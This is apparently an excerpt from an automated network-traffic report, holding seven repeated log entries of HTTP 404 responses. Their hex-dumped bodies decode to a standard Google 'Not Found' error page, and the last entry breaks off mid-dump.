                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 